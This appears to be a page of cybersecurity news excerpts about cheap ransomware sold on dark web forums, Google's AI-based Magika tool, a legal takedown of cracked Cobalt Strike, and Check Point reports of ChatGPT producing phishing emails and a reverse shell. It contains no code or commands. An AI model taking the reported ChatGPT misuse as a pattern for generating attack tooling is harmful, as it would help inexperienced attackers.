Cheap ransomware is being sold for one-time use on dark web forums, allowing inexperienced freelancers to get into cybercrime without any interaction with affiliates.
Researchers at the intelligence unit at the cybersecurity firm Sophos found 19 ransomware varieties being offered for sale or advertised as under development on four forums from June 2023 to February 2024.
Google has confirmed a new security scheme which, it says, will help “secure, empower and advance our collective digital future” using AI. Part of this AI Cyber Defence Initiative includes open-sourcing the new, AI-powered, Magika tool that is already being used to help protect Gmail users from potentially problematic content.
Microsoft’s Digital Crimes Unit (DCU), cybersecurity software company Fortra™ and Health Information Sharing and Analysis Center (Health-ISAC) are taking technical and legal action to disrupt cracked, legacy copies of Cobalt Strike and abused Microsoft software, which have been used by cybercriminals to distribute malware, including ransomware. This is a change in the way DCU has...
At the end of November 2022, OpenAI released ChatGPT, the new interface for its Large Language Model (LLM), which instantly created a flurry of interest in AI and its possible uses. However, ChatGPT has also added some spice to the modern cyber threat landscape as it quickly became apparent that code generation can help less-skilled threat actors effortlessly launch cyberattacks.
In Check Point Research’s (CPR) previous blog, we described how ChatGPT successfully conducted a full infection flow, from creating a convincing spear-phishing email to running a reverse shell, capable of accepting commands in English. The question at hand is whether this is just a hypothetical threat or if there are already threat actors using OpenAI technologies for malicious purposes.
CPR’s analysis of several major underground hacking communities shows that there are already first instances of cybercriminals using OpenAI to develop malicious tools. As we suspected, some of the cases clearly showed that many cybercriminals using OpenAI have no development skills at all. Although the tools that we present in this report are pretty basic, it’s only a matter of time until more sophisticated threat actors enhance the way they use AI-based tools for bad.